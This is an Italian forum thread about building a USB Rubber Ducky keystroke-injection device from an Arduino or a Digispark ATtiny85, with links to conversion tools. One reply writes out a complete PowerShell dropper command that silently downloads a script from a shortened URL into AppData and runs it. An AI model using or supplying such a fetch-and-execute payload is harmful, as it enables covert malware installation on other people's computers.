Discussione Usb rubber ducky

Stato
Discussione chiusa ad ulteriori risposte.

$ARTUR$

Utente Silver
28 Luglio 2017
166
25
9
80
Salve, ho da poco acquistato arduino nano per creare una usb rubber ducky, vedendo i vari tutorial disponibili online però, mi sono accorto che serviva arduino micro‍♂️. Posso comunque provare a farla? Qualcuno mi saprebbe linkare il codice?
Ps. Non dispongo di slot per micro sd
 
ciao esatto, per quello che hai bisogno tu, necessiti di un arduino micro o leonardo perché hanno nativamente l'utilità di essere tastiera e/o mouse....purtroppo sarebbe troppo comodo avere tutto pronto...usa Google e avrai ciò che serve...
Penso che sia meraviglioso cercare di far da se...Si impara moltissimo...Il copia incolla, come l'aver servito su un piatto di argento è triste, anzi tristissimo.
Anzi una soluzione c'è....impara il C e a programmare arduino in simil C
 
Ultima modifica:
Ordina su amazon un Digispark Attiny85, costa qualche euro e ti permette di avere una soluzione di minime dimensioni ma funzionale.
Si tratta di una chiavettina con un microcontrollore AVR programmabile direttamente dall'ide di arduino, dopo aver installato i giusti driver (https://digistump.com/wiki/digispark/tutorials/connecting).
Per ora, secondo me, il miglior modo di sfruttare l'attiny come rubber ducky è utilizzare questo script in py https://github.com/mame82/duck2spark.
Duck2spark permette di generare un file .ino partendo da uno script per la rubber ducky originale (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript).
Una limitazione potrebbe essere la dimensione della memoria flash in cui viene messo il payload. Questo problema è facilmente superabile tramite l'uso di un dropper di script in Powershell o bat (magari caricati direttamente su pastebin: cmd /c start /min powershell wget 'goo.gl/B2KhQ5' -o "$ENV:AppData'\a.bat'";(New-Object -com shell.application).shellexecute($ENV:AppData+'\a.bat');) oppure semplicemente exe (comandi wget e exec di powershell).
magari in futuro posterò una guida sull'argomento.
 
Stato
Discussione chiusa ad ulteriori risposte.